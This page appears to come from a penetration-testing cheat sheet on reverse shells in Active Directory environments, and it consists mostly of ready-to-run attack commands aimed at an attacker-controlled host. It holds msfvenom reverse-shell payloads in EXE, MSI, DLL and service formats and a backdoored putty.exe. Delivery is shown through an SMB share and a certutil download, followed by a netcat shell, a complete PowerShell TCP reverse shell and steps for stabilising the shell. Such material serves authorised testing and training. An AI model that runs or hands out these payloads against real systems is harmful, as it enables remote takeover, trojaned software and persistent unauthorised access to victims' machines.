06 / Reverse Shells

Reverse Shells

Establish a persistent callback from a Windows or Linux AD machine to your listener. Covers msfvenom payloads, Windows CMD/PowerShell shells and shell stabilisation.

Windows Reverse Shells in AD

Generating and delivering payloads via msfvenom, certutil, and PowerShell. Hosting via SMB share and catching with Netcat.

msfvenomcertutilPowerShell
soon

Start Your Listener First

nc 
sudo nc -nvlp $ATTACKER_PORT

MsfVenom — Windows Payloads

exe / msi / dll / exe-service
EXE payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe -o payload.exe
MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o payload.msi
msiexec /quiet /qn /i C:\Windows\Temp\payload.msi
EXE Service (for service exploitation)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o reverse.exe
DLL payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f dll -o payload.dll
Inject into existing EXE (e.g. putty.exe)
msfvenom -a x64 --platform windows -x putty.exe -k \
  -p windows/meterpreter/reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT \
  -b "\x00" -f exe -o puttyX.exe

Host & Deliver the Payload

SMB server / certutil
Host via impacket SMB server (attacker)
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py share_name .
Copy from SMB on target
copy \\$ATTACKER_IP\share_name\reverse.exe C:\Windows\Temp\reverse.exe
C:\Windows\Temp\reverse.exe
Download via certutil (target)
certutil -urlcache -split -f "http://$ATTACKER_IP:8000/payload.exe" "payload.exe"
certutil -urlcache -split -f "http://$ATTACKER_IP:8000/nc.exe" "%TEMP%\nc.exe"
Run netcat from target
"nc.exe" -e cmd.exe $ATTACKER_IP $ATTACKER_PORT

PowerShell Reverse Shell

base64 encoded
Generate at revshells.com
https://www.revshells.com/
Basic PowerShell reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('$ATTACKER_IP',$ATTACKER_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Stabilise a Linux Shell

pty / stty
1. Spawn a proper bash shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
2. Set TERM variable
export TERM=xterm
3. Background + stty raw
Ctrl+Z
stty raw -echo; fg
reset
← Exploitation Next: Post Exploitation →